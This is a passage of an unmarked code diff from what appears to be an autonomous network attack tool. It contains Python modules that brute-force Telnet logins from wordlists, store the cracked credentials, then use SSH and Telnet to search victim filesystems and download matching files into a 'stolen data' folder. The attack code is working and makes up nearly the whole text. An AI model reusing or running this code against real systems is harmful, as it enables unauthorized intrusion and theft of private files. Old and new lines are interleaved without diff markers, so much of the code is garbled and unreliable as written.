SELECT "user", "password"
FROM creds
WHERE service='ssh'
AND COALESCE(ip,'') = :ip
AND (port IS NULL OR port = :port)
""",
params
)
# Pull by MAC (if we have one)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user", "password"
FROM creds
WHERE service='ssh'
AND COALESCE(mac_address,'') = :mac
AND (port IS NULL OR port = :port)
""",
params
)
# Deduplicate while preserving order
seen = set()
out: List[Tuple[str, str]] = []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# --------------------- SSH helpers ---------------------
def connect_ssh(self, ip: str, username: str, password: str, port: int = b_port, timeout: int = 10):
"""
Open an SSH connection (no agent, no keys). Returns an active SSHClient or raises.
NOTE: Paramiko logs are silenced at module import level.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, username=username, password=password)
logger.info(f"Connected to {ip} via SSH with username {username}")
# Be explicit: no interactive agents/keys; bounded timeouts to avoid hangs
ssh.connect(
hostname=ip,
username=username,
password=password,
port=port,
timeout=timeout,
auth_timeout=timeout,
banner_timeout=timeout,
allow_agent=False,
look_for_keys=False,
)
logger.info(f"Connected to {ip} via SSH as {username}")
return ssh
except Exception as e:
logger.error(f"Error connecting to SSH on {ip} with username {username}: {e}")
raise
def find_files(self, ssh, dir_path):
def find_files(self, ssh: paramiko.SSHClient, dir_path: str) -> List[str]:
"""
Find files in the remote directory based on the configuration criteria.
List candidate files from remote dir, filtered by config:
- shared_data.steal_file_extensions (endswith)
- shared_data.steal_file_names (substring match)
Uses `find <dir> -type f 2>/dev/null` to keep it quiet.
"""
try:
stdin, stdout, stderr = ssh.exec_command(f'find {dir_path} -type f')
files = stdout.read().decode().splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit :
# Quiet 'permission denied' messages via redirection
cmd = f'find {dir_path} -type f 2>/dev/null'
stdin, stdout, stderr = ssh.exec_command(cmd)
files = (stdout.read().decode(errors="ignore") or "").splitlines()
exts = set(self.shared_data.steal_file_extensions or [])
names = set(self.shared_data.steal_file_names or [])
if not exts and not names:
# If no filters are defined, do nothing (too risky to pull everything).
logger.warning("No steal_file_extensions / steal_file_names configured — skipping.")
return []
matches: List[str] = []
for fpath in files:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file)
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
raise
fname = os.path.basename(fpath)
if (exts and any(fname.endswith(ext) for ext in exts)) or (names and any(sn in fname for sn in names)):
matches.append(fpath)
def steal_file(self, ssh, remote_file, local_dir):
logger.info(f"Found {len(matches)} matching files in {dir_path}")
return matches
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
"""
Download a file from the remote server to the local directory.
Download a single remote file into the given local dir, preserving subdirs.
"""
try:
sftp = ssh.open_sftp()
self.sftp_connected = True # Mark SFTP as connected
self.sftp_connected = True # first time we open SFTP, mark as connected
# Preserve partial directory structure under local_dir
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
sftp.close()
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
raise
def execute(self, ip, port, row, status_key):
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
# --------------------- Orchestrator entrypoint ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
Steal files from the remote server using SSH.
Orchestrator entrypoint (signature preserved):
- ip: target IP
- port: str (expected '22')
- row: current target row (compat structure built by shared_data)
- status_key: action name (b_class)
Returns 'success' if at least one file stolen; else 'failed'.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSSH"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
self.shared_data.bjorn_orch_status = b_class
# Get SSH credentials from the cracked passwords file
sshfile = self.shared_data.sshfile
credentials = []
if os.path.exists(sshfile):
with open(sshfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
# Gather credentials from DB
try:
port_i = int(port)
except Exception:
port_i = b_port
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}")
if not creds:
logger.error(f"No SSH credentials for {ip}. Skipping.")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no SFTP connection is established.
"""
# Define a timer: if we never establish SFTP in 4 minutes, abort
def _timeout():
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer = Timer(240, _timeout)
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
# Identify where to save loot
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"ssh/{mac}_{ip}")
# Try each credential until success (or interrupted)
success_any = False
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
logger.info("Execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ssh = self.connect_ssh(ip, username, password)
remote_files = self.find_files(ssh, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ssh/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
self.steal_file(ssh, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
ssh.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
ssh = self.connect_ssh(ip, username, password, port=port_i)
# Search from root; filtered by config
files = self.find_files(ssh, '/')
if files:
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted during download.")
break
self.steal_file(ssh, remote, base_dir)
logger.success(f"Successfully stole {len(files)} files from {ip}:{port_i} as {username}")
success_any = True
try:
ssh.close()
except Exception:
pass
if success_any:
break # one successful cred is enough
except Exception as e:
# Stay quiet on Paramiko internals; just log the reason and try next cred
logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}")
timer.cancel()
return 'success' if success_any else 'failed'
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
# Minimal smoke test if run standalone (not used in production; orchestrator calls execute()).
try:
shared_data = SharedData()
steal_files_ssh = StealFilesSSH(shared_data)
# Add test or demonstration calls here
sd = SharedData()
action = StealFilesSSH(sd)
# Example (replace with a real IP that has creds in DB):
# result = action.execute("192.168.1.10", "22", {"MAC Address": "AA:BB:CC:DD:EE:FF"}, b_status)
# print("Result:", result)
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,180 +1,218 @@
"""
steal_files_telnet.py - This script connects to remote Telnet servers using provided credentials, searches for specific files, and downloads them to a local directory.
steal_files_telnet.py — Telnet file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (TelnetBruteforce).
- Credentials read from DB.creds (service='telnet'); we try each pair.
- Files found via 'find / -type f', then retrieved with 'cat'.
- Output under: {data_stolen_dir}/telnet/{mac}_{ip}/...
"""
import os
import telnetlib
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_telnet.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesTelnet"
b_module = "steal_files_telnet"
b_status = "steal_files_telnet"
b_parent = "TelnetBruteforce"
b_port = 23
class StealFilesTelnet:
"""
Class to handle the process of stealing files from Telnet servers.
"""
def __init__(self, shared_data):
try:
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesTelnet initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_telnet(self, ip, username, password):
"""
Establish a Telnet connection.
"""
# -------- Identity cache --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
tn = telnetlib.Telnet(ip)
tn.read_until(b"login: ")
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Creds --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='telnet'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='telnet'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# -------- Telnet helpers --------
def connect_telnet(self, ip: str, username: str, password: str) -> Optional[telnetlib.Telnet]:
try:
tn = telnetlib.Telnet(ip, b_port, timeout=10)
tn.read_until(b"login: ", timeout=5)
tn.write(username.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ")
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
tn.read_until(b"$", timeout=10)
logger.info(f"Connected to {ip} via Telnet with username {username}")
# prompt detection (naïf mais identique à l'original)
time.sleep(2)
self.telnet_connected = True
logger.info(f"Connected to {ip} via Telnet as {username}")
return tn
except Exception as e:
logger.error(f"Telnet connection error for {ip} with user '{username}' & password '{password}': {e}")
logger.error(f"Telnet connect error {ip} {username}: {e}")
return None
def find_files(self, tn, dir_path):
"""
Find files in the remote directory based on the config criteria.
"""
def find_files(self, tn: telnetlib.Telnet, dir_path: str) -> List[str]:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
tn.write(f'find {dir_path} -type f\n'.encode('ascii'))
files = tn.read_until(b"$", timeout=10).decode('ascii').splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
out = tn.read_until(b"$", timeout=10).decode('ascii', errors='ignore')
files = out.splitlines()
matches = []
for f in files:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file.strip())
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
fname = os.path.basename(f.strip())
if (self.shared_data.steal_file_extensions and any(fname.endswith(ext) for ext in self.shared_data.steal_file_extensions)) or \
(self.shared_data.steal_file_names and any(sn in fname for sn in self.shared_data.steal_file_names)):
matches.append(f.strip())
logger.info(f"Found {len(matches)} matching files under {dir_path}")
return matches
except Exception as e:
logger.error(f"Error finding files on Telnet: {e}")
logger.error(f"Telnet find error: {e}")
return []
def steal_file(self, tn, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
def steal_file(self, tn: telnetlib.Telnet, remote_file: str, base_dir: str) -> None:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("Steal interrupted.")
return
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
tn.write(f'cat {remote_file}\n'.encode('ascii'))
f.write(tn.read_until(b"$", timeout=10))
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from Telnet: {e}")
logger.error(f"Telnet download error {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using Telnet.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesTelnet"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get Telnet credentials from the cracked passwords file
telnetfile = self.shared_data.telnetfile
credentials = []
if os.path.exists(telnetfile):
with open(telnetfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} Telnet credentials in DB for {ip}")
if not creds:
logger.error(f"No Telnet credentials for {ip}. Skipping.")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no Telnet connection is established.
"""
def _timeout():
if not self.telnet_connected:
logger.error(f"No Telnet connection established within 4 minutes for {ip}. Marking as failed.")
logger.error(f"No Telnet connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer = Timer(240, _timeout)
timer.start()
# Attempt to steal files using each credential
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"telnet/{mac}_{ip}")
success = False
for username, password in credentials:
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
logger.info("Execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
tn = self.connect_telnet(ip, username, password)
if tn:
remote_files = self.find_files(tn, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"telnet/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if not tn:
continue
files = self.find_files(tn, '/')
if files:
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
logger.info("Execution interrupted.")
break
self.steal_file(tn, remote_file, local_dir)
self.steal_file(tn, remote, base_dir)
logger.success(f"Stole {len(files)} files from {ip} as {username}")
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
try:
tn.close()
except Exception:
pass
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
logger.error(f"Telnet loot error {ip} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_telnet = StealFilesTelnet(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -0,0 +1,272 @@
"""
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='telnet')
- Conserve la logique dorigine (telnetlib, queue/threads)
"""
import os
import telnetlib
import threading
import logging
import time
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from logger import Logger
logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG)
b_class = "TelnetBruteforce"
b_module = "telnet_bruteforce"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
b_service = '["telnet"]'
b_trigger = 'on_any:["on_service:telnet","on_new_port:23"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class TelnetBruteforce:
"""Wrapper orchestrateur -> TelnetConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_bruteforce = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""Lance le bruteforce Telnet pour (ip, port)."""
return self.telnet_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed')."""
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""Gère les tentatives Telnet, persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
# ---------- util fichiers ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- Telnet ----------
def telnet_connect(self, adresse_ip: str, user: str, password: str) -> bool:
try:
tn = telnetlib.Telnet(adresse_ip)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
try:
tn.close()
except Exception:
pass
if response[0] == 2 or response[0] == 3:
return True
except Exception:
pass
return False
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('telnet',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='telnet'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for Telnet bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.telnet_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_telnet", 0) > 0:
time.sleep(self.shared_data.timewait_telnet)
def run_bruteforce(self, adresse_ip: str, port: int):
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords)
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results
# ---------- persistence DB ----------
def save_results(self):
for mac, ip, hostname, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="telnet",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=None
)
else:
logger.error(f"insert_cred failed for {ip} {user}: {e}")
self.results = []
def removeduplicates(self):
pass
if __name__ == "__main__":
try:
sd = SharedData()
telnet_bruteforce = TelnetBruteforce(sd)
logger.info("Telnet brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,206 +0,0 @@
"""
telnet_connector.py - This script performs a brute-force attack on Telnet servers using a list of credentials,
and logs the successful login attempts.
"""
import os
import pandas as pd
import telnetlib
import threading
import logging
import time
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="telnet_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "TelnetBruteforce"
b_module = "telnet_connector"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
class TelnetBruteforce:
"""
Class to handle the brute-force attack process for Telnet servers.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_connector = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""
Perform brute-force attack on a Telnet server.
"""
return self.telnet_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute-force attack.
"""
self.shared_data.bjornorch_status = "TelnetBruteforce"
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""
Class to handle Telnet connections and credential testing.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.telnetfile = shared_data.telnetfile
# If the file does not exist, it will be created
if not os.path.exists(self.telnetfile):
logger.info(f"File {self.telnetfile} does not exist. Creating...")
with open(self.telnetfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for Telnet ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
def telnet_connect(self, adresse_ip, user, password):
"""
Establish a Telnet connection and try to log in with the provided credentials.
"""
try:
tn = telnetlib.Telnet(adresse_ip)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
# Wait to see if the login was successful
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
tn.close()
# Check if the login was successful
if response[0] == 2 or response[0] == 3:
return True
except Exception as e:
pass
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.telnet_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing Telnet...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful login attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.telnetfile, index=False, mode='a', header=not os.path.exists(self.telnetfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results file.
"""
df = pd.read_csv(self.telnetfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.telnetfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
telnet_bruteforce = TelnetBruteforce(shared_data)
logger.info("Starting Telnet brute-force attack on port 23...")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute-force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing TelnetBruteforce on {ip}...")
telnet_bruteforce.execute(ip, b_port, row, b_status)
